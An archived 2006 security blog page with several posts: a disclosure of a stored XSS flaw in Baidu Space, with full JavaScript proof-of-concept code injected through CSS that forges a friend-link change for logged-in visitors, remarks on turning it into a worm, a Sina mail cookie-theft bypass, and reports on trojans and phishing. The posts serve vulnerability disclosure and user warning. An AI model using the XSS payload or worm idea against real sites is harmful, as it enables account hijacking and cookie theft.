| Daishuo's profileDai Shuo's SpaceBlogListsNetwork |  Tools  Help |
|
July 24 Baidu Space XSS VulnerabilityBaidu (Nasdaq: BIDU) launched its Blog service – Baidu Space Beta 10 days ago. It’s a blog system with no highlights at all, but I still moved my Chinese blog down there for better bandwidth and stability. Here’s an XSS vulnerability I found last Friday. 1. Script injection Baidu space allows users to change their spaces’ CSS freely, but the system does not filter any injected scripts out. For example, a CSS definition like “body { background:url(javascript:alert(‘hello’)); } ” will pop a message box. Users could inject any scripts into the CSS of their spaces. This is dangerous because bad guys can plate a trojan by injecting some exploits. 2. The XSS attack Baidu uses a cookie to tell whether a user has been logged on or not. The cookie’s domain is baidu.com. In other word, any script on baidu.com can obtain and use that cookie freely. Once you send some commands using the cookie stolen from a user, Baidu recognizes you as the victim himself. I’ll give a PoC below, which will add a friend link to your Friend List as long as you have a Baidu Space, and logged on. Here’s the link, http://hi.baidu.com/somethingbad And here’s the code I’ve injected to http://hi.baidu.com/somethingbad’s CSS, #header{height:89px;background:url("javascript:document.body.onload = function(){
var req = null; if(window.XMLHttpRequest) req = new XMLHttpRequest(); else if(window.ActiveXObject){ var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); for(var i=0;i<msxml.length;i++){try{req = new ActiveXObject(msxml[i]); break;}catch(e){}} try{req.overrideMimeType('text/xml')}catch(e){} } req.open('get','.',false); req.send(); var s=req.responseText; p=s.indexOf('passport.baidu.com/?logout'); if(p>0) { p=s.indexOf('<strong>'); if(p>0) { p=s.indexOf('/',p); p2=s.indexOf(String.fromCharCode(34),p); var user=s.substring(p+1,p2); var name='Here is a bad site'; var link='http://hi.baidu.com/somethingbad'; var desc='This link was added by an XSS script'; var url='/'+user+'/commit'; var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc); req.open('post',url,false); req.send(data); alert('A friend link has been added to your space at http://hi.baidu.com/' +user); } } else{alert('You are not a logged Baidu user.');}
}"); } 3. Web 2.0 worm opportunity The problem is actually quite similar to the Sammy case of MySpace. A web 2.0 worm could be accomplished based on such XSS vulnerabilities. With a slight modification, the codes could copy themselves to victim’s CSS, and hence, a worm comes into being. Baidu did a fast response when their validate code algorithm got cracked. I hope it could do a great job too this time. July 05 The Month of Browser BugsH D Moore opened the Browser Fun Blog on July 2nd. Here’s their welcome post, “This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!” So far, they’ve published 5 bugs. Affected browsers are IE, Firefox and Safari. See the bug list below, The blog is really cool, but unfortunately, Chinese users just cannot access it directly since GFW banned the whole blogspot.com domain. Here’re 2 simple ways to bypass GFW,
June 30 A Caution to Chinese WoW PlayersOne of my colleagues told me that he found a suspicious post on MOP’s WoW forum last night. All hyperlinks inside the post pointed to the same URL, and when he clicked, IE lost response. After studying on the source, I found that the inside links would lead users to a malicious site, which exploits 6 different critical flaws to install trojans. Here’s the misused flaw list,
Fortunately, vendors have issued patches for them all. The to-be-installed trojans target 3 popular online games - World of Warcraft, Legend of Mir and Menghuan Xiyou. Around 530 players have read the phishing post in past 40 hours, and the number is still increasing. Do not open the post shown below, and if you already did, run antivirus software with latest database immediately and change your password later.
June 28 A Paper on Defeating GFWA post of SecuriTeam Blogs leads me to a paper on how to defeat the “Great Firewall” of China. The paper explained how GFW works and issued a solution to beat it. It’s worth reading, and I hope some of you guys could download the paper before it gets banned. Phisher Targets ICBC AccountsWe received a few variants of a phishing trojan which targets ICBC (Industrial and Commercial Bank of China) user accounts. Once launched, the trojan observes URL addresses opened by IE, and pops up a phishing dialog box when victim user tries to logon ICBC online bank. We have detected a dozen infections, the real number of victims may be multiplied times. The phishing window, filled by a screenshot picture of the online bank web page with some hoax words, tries to persuade victim to submit his/her account password. Stolen information will be send to VXer through email. See the picture below (click it to view a large one),
Screenshooting is one of the most common methods used by phishing trojans. It’s easy to notice such trick if users click some controls on the window, e.g. dragging scrollbars. June 23 Extortioner Opened Trojan SourceA few days ago, I blogged a trojan extortioner – Trojan/Agent.bq, which was then reported a lot by Chinese media in the past week.
The trojan author, who hardcoded bank account, cell phone number and real name into his malwares, contacted us through MSN and left an evidence of illegal income. As a result, he got more famous for his incautiousness. Last night, he drew our attention again by posting viral source codes to a public forum. His posts were confirmed to be the source of Trojan/Agent.bq. The motivation might come from two aspects. One is to fire a variants explosion, and the other is to protect the VXer himself, since he might no longer be the only person who owns these sources. But unfortunately, neither is very likely to be achieved. The source was posted to a non-technical forum, and stayed online for just 5~6 hours in very early morning. I don’t think a variants explosion will really happen unless the source is published again to the right place in the right time. While the posts were downloaded by almost nobody, however, they exposed the author’s IP, which would help police to locate the guy easier. June 22 Naked Girl Scores in Soccer GameAre you bored with world cup games playing by males? If so, our newly found trojan probably meets your need. The malicious file was named “Naked Girl Playing Soccer”. When launched, it played a 23-second long video, in which a totally naked girl kicked a 20-yard field goal. See the snapshot below,
 However, a variant of Backdoor/Huigezi (alias Backdoor.Graybird) was dropped along with the video. Hackers can take complete control over infected PC’s. A technical report (in Chinese) has been published to our company's website for those who want more details. June 21 More comments about Yahoo and Sina web servicesA few days ago, I was a little bit worried that Yamanner worm would encourage hackers to find more vulnerabilities of Yahoo web services. Now the prediction comes true. A series of Proof of Concepts have been published on full-disclosure mailing-list today. Multiple Yahoo vulnerabilities were involved, including authentication bypass, session binding, cookie encoding security weakness and cross-site scripting. Yahoo got work to do.
Date: Mon, 12 Jun 2006 22:43:11 +0800
--=====003_Dragon577540504666_===== this is a test. --=====003_Dragon577540504666_===== <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> --=====003_Dragon577540504666_=====--
User cookie will be displayed in the mail body. And of course the cookie could be submitted to some guy’s database as well. Once we send a “GET” request to mail.sina.com.cn with one’s cookie, we can logon his account. And thus, an authentication bypass occurs.
June 19 Microsoft’s Happy WeekendSomething happened to Microsoft in the last week end, at least two of them are worth a mention here. First, a new 0-day vulnerability of Excel was confirmed by MSRC last Saturday. The malicious sample was firstly reported on June 14, which was just the next day after Microsoft’s “patch Tuesday”. Technical details were not public. I don’t think MS will release an out-of-cycle patch for it. Excel will probably remain exploitable until July 11. Here’re some links about the 0-day, Microsoft Excel 0-day Vulnerability FAQ Reports of a new vulnerability in Microsoft Excel New Excel zero-day flaw used in attacks Second, Microsoft France was hacked. See the snapshot below (click it to view large pic)
TiTHacK, the hacker, was really active these days, and Microsoft.com is his/her next target. Is it another 0-day of Win2003+IIS6.0? Let’s wait and see. |
|||||||||||
|
|
